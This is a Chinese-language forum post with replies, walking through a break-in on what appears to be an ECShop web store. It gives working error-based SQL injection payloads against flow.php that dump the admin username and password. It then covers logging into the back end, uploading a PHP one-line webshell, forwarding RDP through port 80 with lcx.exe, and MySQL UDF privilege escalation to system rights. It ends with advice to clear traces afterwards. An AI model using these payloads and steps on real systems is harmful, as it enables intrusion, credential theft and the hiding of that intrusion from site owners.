打开目标网站看看,看到这个网站版本:
用nmap扫描:
下载网站相关源码,在本地搭建环境,做测试,看看网站框架: 看到admin这个文件夹,用浏览器打开看看,成功找到网站后台管理界面:
然后尝试用admin,admin/123456/admin888等若口令登陆,都没成功:
既然后台管理这没什么突破,但是我们已经知道了网站框架,不妨用浏览器打开看看,说不定会有收获,比如data、temp等比较重要的目录:
找到一个网站的报错注入点在购物车结算那个页面ip/flow.php,在本机做测试,注入看看查看数据库路径:goods_number%5B2' and updatexml(1,concat(0x5e24,(@@datadir),0x5e24),1) or '1 %5D=1&submit=%E6%9B%B4%E6%96%B0%E8%B4%AD%E7%89%A9%E8%BD%A6&step=update_cart
查看权限: goods_number%5B2' and updatexml(1,concat(0x5e24,(user()),0x5e24),1) or '1 %5D=1&submit=%E6%9B%B4%E6%96%B0%E8%B4%AD%E7%89%A9%E8%BD%A6&step=update_cart
查看当前数据库名字:
爆出管理员用户名和密码:为admin,haha123concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#%5D=1&goods_number%5B47%5D=1&submit=%E6%9B%B4%E6%96%B0%E8%B4%AD%E7%89%A9%E8%BD%A6&step=update_cart
用admin,haha123成功进入后台:
在后台找到一个上传点:
可以直接上传一个php 一句话木马,菜刀成功连接:
查看权限:
查看开放端口,有个3389 ,但是不允许外连,此时我们就可以用lce.exe端口转发,经测试,还是不行。然后ping了一下百度,可以ping通,说明网站80端口是允许外连的。那么可以将3389 转发到80端口,上传一个lcx.exe到wwwroot主目录下,然后执行命令:
在本机上执行命令:lcx.exe 80 6543
远程连接成功:
菜刀连接后,在一个user.MYD 的文档里找到数据库的用户名
密码经过MD5 加密,40位的,解密时,去前三后一得到用户名和密码为 root,root123查看端口,mysql 的默认端口是3306,但是菜刀连不上猜测可能是端口被管理员改了,查看端口看看:输入命令:tasklist /svc ,可以看到mysqld-nt.exe的pid号为1364
所以可以断定, mysql的端口被改为3307了,然后成功连接数据库了
然后也可以用mysq 提权。上传一个 udf.php,进行提权
浏览器访问:
连接成功,导出 DLLMysql 4.1 以前版本对导出udf.dll文件位置无要求, 5.0 以后对导出位置做了 限制,只能导出到system或system32目录下。 5.1 以后只能导出到mysql安装目录下lib/plugin/目录中
查看权限就是管理员了权限了:
开启3389命令:select cmdshell('regedit /s d:web3389.reg') 成功获得系统权限注意:完事之后要清理留下的痕迹。
=============================
在校大学生,降低标准给予通过。
管理05
| 
懂了 在自己上开80 这样子绕过 哈哈
楼主
3389转到80上面怎么弄的怎么没看懂啊帖子里面那种转会不会影响网站啊